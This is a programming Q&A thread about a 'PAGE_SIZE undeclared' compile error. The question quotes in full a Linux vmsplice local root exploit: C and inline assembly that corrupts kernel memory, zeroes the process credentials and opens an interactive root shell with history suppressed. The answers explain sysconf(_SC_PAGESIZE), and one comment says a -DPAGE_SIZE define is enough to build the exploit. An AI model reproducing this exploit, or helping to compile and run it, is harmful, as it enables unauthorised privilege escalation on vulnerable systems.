# PAGE_SIZE undeclared C

Tags: c, linux, gcc

I am having some issues compiling / fixing a script due to the fact I am not well versed in the C language.

I would appreciate some help fixing the issues!

I get the following errors:

> ```
> error: ‘PAGE_SIZE’ undeclared (first use in this function)
>   pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
> ```

This error is because PAGE_SIZE is set within asm/page.h (as far as I am aware)

the code is below and from https://www.exploit-db.com/exploits/5092/

```
   #define _GNU_SOURCE
    #include <stdio.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <string.h>
    #include <malloc.h>
    #include <limits.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/uio.h>
    #include <sys/mman.h>
//    #include <asm/page.h> 
// ^^ this was originally causing me issues, due to the fact this is compiled
//within the kernel 
    #define __KERNEL__
    #include <asm/page.h> //moving it here fixed location error, but now I get the new issue
    #include <asm/unistd.h>

    #define PIPE_BUFFERS    16
    #define PG_compound 14
    #define uint        unsigned int
    #define static_inline   static inline __attribute__((always_inline))
    #define STACK(x)    (x + sizeof(x) - 40)

    struct page {
        unsigned long flags;
        int count;
        int mapcount;
        unsigned long private;
        void *mapping;
        unsigned long index;
        struct { long next, prev; } lru;
    };

    void    exit_code();
    char    exit_stack[1024 * 1024];

    void    die(char *msg, int err)
    {
        printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
        fflush(stdout);
        fflush(stderr);
        exit(1);
    }

    #if defined (__i386__)

    #ifndef __NR_vmsplice
    #define __NR_vmsplice   316
    #endif

    #define USER_CS     0x73
    #define USER_SS     0x7b
    #define USER_FL     0x246

    static_inline
    void    exit_kernel()
    {
        __asm__ __volatile__ (
        "movl %0, 0x10(%%esp) ;"
        "movl %1, 0x0c(%%esp) ;"
        "movl %2, 0x08(%%esp) ;"
        "movl %3, 0x04(%%esp) ;"
        "movl %4, 0x00(%%esp) ;"
        "iret"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (exit_code)
        );
    }

    static_inline
    void *  get_current()
    {
        unsigned long curr;
        __asm__ __volatile__ (
        "movl %%esp, %%eax ;"
        "andl %1, %%eax ;"
        "movl (%%eax), %0"
        : "=r" (curr)
        : "i" (~8191)
        );
        return (void *) curr;
    }

    #elif defined (__x86_64__)

    #ifndef __NR_vmsplice
    #define __NR_vmsplice   278
    #endif

    #define USER_CS     0x23
    #define USER_SS     0x2b
    #define USER_FL     0x246

    static_inline
    void    exit_kernel()
    {
        __asm__ __volatile__ (
        "swapgs ;"
        "movq %0, 0x20(%%rsp) ;"
        "movq %1, 0x18(%%rsp) ;"
        "movq %2, 0x10(%%rsp) ;"
        "movq %3, 0x08(%%rsp) ;"
        "movq %4, 0x00(%%rsp) ;"
        "iretq"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (exit_code)
        );
    }

    static_inline
    void *  get_current()
    {
        unsigned long curr;
        __asm__ __volatile__ (
        "movq %%gs:(0), %0"
        : "=r" (curr)
        );
        return (void *) curr;
    }

    #else
    #error "unsupported arch"
    #endif

    #if defined (_syscall4)
    #define __NR__vmsplice  __NR_vmsplice
    _syscall4(
        long, _vmsplice,
        int, fd,
        struct iovec *, iov,
        unsigned long, nr_segs,
        unsigned int, flags)

    #else
    #define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
    #endif

    static uint uid, gid;

    void    kernel_code()
    {
        int i;
        uint    *p = get_current();

        for (i = 0; i < 1024-13; i++) {
            if (p[0] == uid && p[1] == uid &&
                p[2] == uid && p[3] == uid &&
                p[4] == gid && p[5] == gid &&
                p[6] == gid && p[7] == gid) {
                p[0] = p[1] = p[2] = p[3] = 0;
                p[4] = p[5] = p[6] = p[7] = 0;
                p = (uint *) ((char *)(p + 8) + sizeof(void *));
                p[0] = p[1] = p[2] = ~0;
                break;
            }
            p++;
        }   

        exit_kernel();
    }

    void    exit_code()
    {
        if (getuid() != 0)
            die("wtf", 0);

        printf("[+] root\n");
        putenv("HISTFILE=/dev/null");
        execl("/bin/bash", "bash", "-i", NULL);
        die("/bin/bash", errno);
    }

    int main(int argc, char *argv[])
    {
        int     pi[2];
        size_t      map_size;
        char *      map_addr;
        struct iovec    iov;
        struct page *   pages[5];

        uid = getuid();
        gid = getgid();
        setresuid(uid, uid, uid);
        setresgid(gid, gid, gid);

        printf("-----------------------------------\n");
        printf(" Linux vmsplice Local Root Exploit\n");
        printf(" By qaaz\n");
        printf("-----------------------------------\n");

        if (!uid || !gid)
            die("!@#$", 0);

        /*****/
        pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
        pages[1] = pages[0] + 1;

        map_size = PAGE_SIZE;
        map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
            die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[0]);
        printf("[+] page: 0x%lx\n", pages[1]);

        pages[0]->flags    = 1 << PG_compound;
        pages[0]->private  = (unsigned long) pages[0];
        pages[0]->count    = 1;
        pages[1]->lru.next = (long) kernel_code;

        /*****/
        pages[2] = *(void **) pages[0];
        pages[3] = pages[2] + 1;

        map_size = PAGE_SIZE;
        map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
            die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[2]);
        printf("[+] page: 0x%lx\n", pages[3]);

        pages[2]->flags    = 1 << PG_compound;
        pages[2]->private  = (unsigned long) pages[2];
        pages[2]->count    = 1;
        pages[3]->lru.next = (long) kernel_code;

        /*****/
        pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
        map_size = PAGE_SIZE;
        map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
            die("mmap", errno);
        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
        printf("[+] page: 0x%lx\n", pages[4]);

        /*****/
        map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
        map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (map_addr == MAP_FAILED)
            die("mmap", errno);

        memset(map_addr, 0, map_size);
        printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

        /*****/
        map_size -= 2 * PAGE_SIZE;
        if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
            die("munmap", errno);

        /*****/
        if (pipe(pi) < 0) die("pipe", errno);
        close(pi[0]);

        iov.iov_base = map_addr;
        iov.iov_len  = ULONG_MAX;

        signal(SIGPIPE, exit_code);
        _vmsplice(pi[1], &iov, 1, 0);
        die("vmsplice", errno);
        return 0;
    }

    // milw0rm.com [2008-02-09]
```

Comment: In C language, you have to declare a variable before using it, unless it is a predefined variable. PAGE_SIZE is not a predefined variable.

Comment: @Achilles-96 well you can see that the mistake is answered below, but my belief was that i was set due to asm/page.h

Answer (score 25, accepted):

Using a compile-time constant for the page size of your system is typically not a smart thing to do, as it's not necessarily constant. For example, on the latest x86 CPUs, your operating system can choose between using 4 KiB, 2 MiB and even 1 GiB pages (or even combine them in the same address space). For this reason, POSIX hasn't standardized the `PAGE_SIZE` constant.

Many systems therefore provide a `getpagesize()` function, but keep in mind that the POSIX standardized way of obtaining the page size is by using the `sysconf()` function:

```
#include <stdio.h>
#include <unistd.h>
int main() {
  printf("%lu\n", sysconf(_SC_PAGESIZE));
}
```

On my Mac, this program prints the number 4096.

Comment: this is good information, you have taught me a few things I will remember!

Comment: Is there a real world situation where the page size may change between two executions of your program?

Comment: Yes. x86 macOS applications emulated on an M1 based Mac. x86 has a 4KB page size, while macOS running on ARM64-based CPUs uses a 16 KB page size. This means that if you run an x86 macOS application on an M1 based Mac using Rosetta, it uses a different page size.

Comment: Repeating a comment below: this function has been removed in recent versions of POSIX, and new code should use `sysconf(_SC_PAGE_SIZE)` or `sysconf(SC_PAGESIZE)` instead.

Comment: BTW, on my my Apple M1 MacBook Pro, the page size is 16384! It's my first time encountering a non-4096 page size in the wild.

Answer (score 8):

`PAGE_SIZE` is only declared in the kernel headers. You can get the current page size from userland using `getpagesize()` from `unistd.h` though, e.g.

```
#include <unistd.h>
int main() {
    size_t psize = getpagesize();
}
```

Comment: [`getpagesize()`](http://man7.org/linux/man-pages/man2/getpagesize.2.html) is deprecated, and not specified in POSIX.1. In particular, if you write portable code using `#define _POSIX_C_SOURCE 200108L` (or later), `getpagesize()` won't be declared in glibc headers. The correct call is [`sysconf(_SC_PAGESIZE)`](http://man7.org/linux/man-pages/man3/sysconf.3.html) which is standardized in POSIX.1, and thus available in all POSIXy operating systems. [Ed's answer](http://stackoverflow.com/a/37897870/1475978) is the correct one; this is just the popular, works-for-me-I-don't-care-about-others one.

Comment: This is a perfect example of why unpinning the accepted answer was such a good decision.

Answer (score 5):

For me

```
#include <sys/user.h>
```

does the trick. The file is part of glibc-headers.

Comment: I don't think this is a good idea for _general use_ given this note at the top of the header: `The whole purpose of this file is for GDB and GDB only.  Don't read too much into it.  Don't use it for anything other than GDB unless you know what you are doing.`

Comment: Yes `sysconf(_SC_PAGE_SIZE)` would be better in general. But for the purpose of compiling a architecture specific, Linux kernel 2.6.17 .. 2.6.24.1 vmsplice exploit using inline assembly, and given it is still a constant in the kernel headers ... even an `-DPAGE_SIZE=4096` would do.

Answer (score 3):

Heylo.  I had similar trouble compiling the excellent memfetch tool by the veritable techie and fellow countryman Michael Zalewski.  Anyway after getting sick of messing around with the problem and searches that led to no answers (like this post, for example), I solved my problem.

I took this straight from the asm/page.h file:

```
    /* PAGE_SHIFT determines the page size */

    #define PAGE_SHIFT      12
    #ifdef __ASSEMBLY__
    #define PAGE_SIZE       (1 << PAGE_SHIFT)
    #else
    #define PAGE_SIZE       (1UL << PAGE_SHIFT)
    #endif
    #define PAGE_MASK       (~(PAGE_SIZE-1))
```

And I dropped it into the C file that needed compiling. In this case, memfetch.c
I dropped it in right after the includes, in with the code's own set of DEFINEs. 
Worked like a charm and the program - a memory mapper seems to be working great.  I've just done it - can't say yet if for example the pages or mem values are off or anything.

Note - Go grab your own asm/page.h defines.  Actually I think they were in asm-generic/page.h  Dunno if they are diff; most certainly are on an x86_64.

Good luck!

Comment: Similarly in Visual Studio UserEnv.h will give you USN_PAGE_SIZE.

Comment: If anyone else runs into this problem, the simplest solution is to compile with `-DPAGE_SIZE=4096U`, and similarly for `PAGE_MASK` if you need it. Apparently this tool assumed some other header it included brought in the Linux kernel headers? This assumption is false on newer releases, but it’ll work for older code that assumes a constant page size.